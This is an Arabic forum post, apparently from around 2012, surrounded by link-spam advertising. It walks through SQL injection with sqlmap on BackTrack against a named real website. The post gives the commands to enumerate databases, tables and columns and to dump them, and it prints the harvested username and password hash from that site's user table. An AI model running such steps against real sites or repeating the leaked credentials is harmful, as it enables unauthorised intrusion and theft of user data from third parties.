مساحة اعلانات نصية ذهبية |
||
اعلن هنا | اعلن هنا | اعلن هنا |
|
|
أدوات الموضوع | انواع عرض الموضوع |
#1
|
|||
|
|||
[ شرح ] استغلال ثغرات sql في الباك تراك
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته الكل يعرف انه ثغرات sql من اقوى واكثر الثغرات انتشارا واحيانا تاخذ وقت في عملية الأستهداف ولاكن الان تستطيع استهداف المواقع المصابة بكل سرعة ممكنة باستخدام اداة في الباك تراك اسم الأداة :sqlmap مسار الاداة : /pentest/database/sqlmap لغة البرمجة : python الأن كيفية استخدام الاداة في عملية الحقن اولا : استخراج اسماء قواعد البيانات لنقل ان هذا الموقع مصاب بثغرة sql [NOTE]http://www.bcspeakers.com/page.php?id=22 [/NOTE] وكلنا نعرف كيفية الفحص وهي باضافة ' الى نهاية الرابط واذا وجد خطأ كان الموقع مصاب الأن الأمر المستخدم في استخراج القواعد لهذا الموقع [NOTE]python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 --dbs [/NOTE] النتيجة [NOTE]available databases [2]:[*] information_schema[*] www-bcspeakerstest [/NOTE] مثل ما شفتو تم استخراج القواعد والان القاعدة المستهدفة هي " www-bcspeakerstest" ثانيا : استخراج الجداول القاعدة المستهدفة هي " www-bcspeakerstest" سوف يكون الأمر بهذا الشكل [NOTE]python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest --tables [/NOTE] والنتيجة كبيرة لن اضعها لانها تتكون من 59 جدول على كل حال انا وجدت الجدول المستهدف وهو "_user" ثالثا : استخراج الأعمدة الان نأتي الى استخراج الأعمدة الموجودة في جدول "_user" الكود كالتالي [NOTE]python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user --columns [/NOTE] والنتيجة كالتالي [NOTE]+----------+---------------------------+ | Column | Type | +----------+---------------------------+ | id_user | int(10) unsigned zerofill | | password | text | | username | text | +----------+---------------------------+ [/NOTE] كما ترون الأعمدة المستهدفة هي password username رابعا : اسخراج البيانات من الاعمدة العمود الاول هو عامود اسم المستخدم "username" سوف يكون الكود كالتالي [NOTE]python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C username --dump [/NOTE] النتيجة [NOTE]+--------------+ | username | +--------------+ | becspeak2803 | | becspeak2803 | +--------------+[/NOTE] كما ترون استخرجنا اسم المستخدم والان نأتي الى استخراج الباسورود اكود مثل السابق مع تغيير اسم العامود الى عامود الباسوورد [NOTE]python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C password --dump [/NOTE] سوف تسألك الأداة اذا كنت تريد محاولة مقارنة الهاش مع قاعدة البيانات المرفقة باالأداة [NOTE]recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] [/NOTE] تختار مثل ما نت عاوز انا اخترت لا لتسريع العملية والنتيجة كالتالي [NOTE]+----------------------------------+ | password | +----------------------------------+ | 286adae502ad9d5ab8c4f8644050b448 | | 286adae502ad9d5ab8c4f8644050b448 | +----------------------------------+[/NOTE] كما ترون تم استخراج البيانات بسرعة كبيرة اتمنى ان يعجبكم الشرح |
pakgestore | pakgestore | pakgestore | pakgestore | pakgestore | pakgestore | pakgestore | pakgestore | pakgestore | pakgestore |
|
|
المواضيع المتشابهه | ||||
الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
مشكله في ثبيت الباك تراك | اشراق العالمrss | اشراق شامل - منوعات | 0 | 10-01-2012 11:30 PM |
[ شرح ] تثبيت الباك تراك على القرص d | rss | اشراق شامل - منوعات | 0 | 08-25-2012 04:00 AM |
[ شرح ] اكبر مكتبة شروحات الباك تراك 5 ار 2 حل جميع مشاكل الباك تراك وستغلال اخطر الثغرة في ديف بوند | rss | اشراق شامل - منوعات | 0 | 08-07-2012 09:12 PM |
[ شرح ] استعمال سيرفر الاباتشي المدمج مع الباك تراك وتركيب السكربتات عليه | rss | اشراق شامل - منوعات | 0 | 07-10-2012 02:00 AM |
مشكلة مع الباك تراك BackTrack 5 | rss | اشراق شامل - منوعات | 0 | 06-12-2012 04:50 PM |
شراء روابط نصية | |
راسلنا الآن لشراء روابط نصية باك لينك وجيست بوست | خدمات الباك لينك والروابط النصية |
روابط نصية AAXA |
عسل النحل |
روابط نصية AA1A | |||||
كورة لايف | koora live | مباريات اليوم بث مباشر | kora 360 | koora4live | كورة لايف |
koora live | مباريات اليوم بث مباشر | kora 360 | koora4live | kooralive | مساحة إعلانيه |
روابط نصية2 M4U | ||||
متجر كي ستور | شدات ببجي اقساط | بطاقات قوقل بلاي | بطاقات ايتونز | اكواد شدات ببجي |
روابط نصية AAZ | ||
متجر الرياض | شدات ببجي | شحن شدات ببجي |
روابط نصية KSM | |||||||
خصومات | هدايا وكوبونات | توفير المال | مال واستثمار | صفقات وتسوق | عروض اسواق السعودية | تحسين مالي | كوبونات |
روابط نصية AN | ||||
يلا شوت | يلا شوت | يلا لايف | yalla shoot | يلا شوت |
روابط نصية M11 | |||||||
كورة جول | يلا لايف | دوت سبورت | bein match | yalla shoot | yalla shoot | koora live | koora live |
يلا شوت | koora4live | سوريا لايف | تابع لايف | كورة لايف | كورة جول | كورة لايف | koora live |
روابط نصية AWA | ||||
كورة لايف | Koora live | يلا شوت | Yalla shoot | يلا شوت |
روابط نصية AA3A | ||||
تقييم شركة exness | تقييم شركة binance | تقييم شركة avatrade | تقييم شركة evest | افضل شركات التداول |
روابط نصية S22 | ||||
تشليح السيارات بالرياض | شراء سيارات تشليح بالرياض | تشليح | تشليح الحاير | تشليح السلى |
موقع شراء سيارات تشليح | شراء سيارات تشليح | تشليح السيارات | قطع غيار تشليح | تشاليح |
روابط نصية AAPA | ||||
دراما كافيه | دراما صح | اهواك Tv | فوستا | شبكتي Tv |
Syria liv | مساحة إعلانيه |
روابط نصية AA25 | ||
عبادي الخليج | شدات ببجي | شدات ببجي تمارا |
روابط نصية AA44 | |||||
كيفية شراء سهم امازون | كيفية شراء سهم ارامكو | كيفية شراء سهم لوسيد | كيفية الاستثمار في الذهب | تقييم شركة evest | تعلم تداول الاسهم |
روابط نصية AA45 | ||||
koora live | koora live | يلا شوت | yalla shoot | koora live |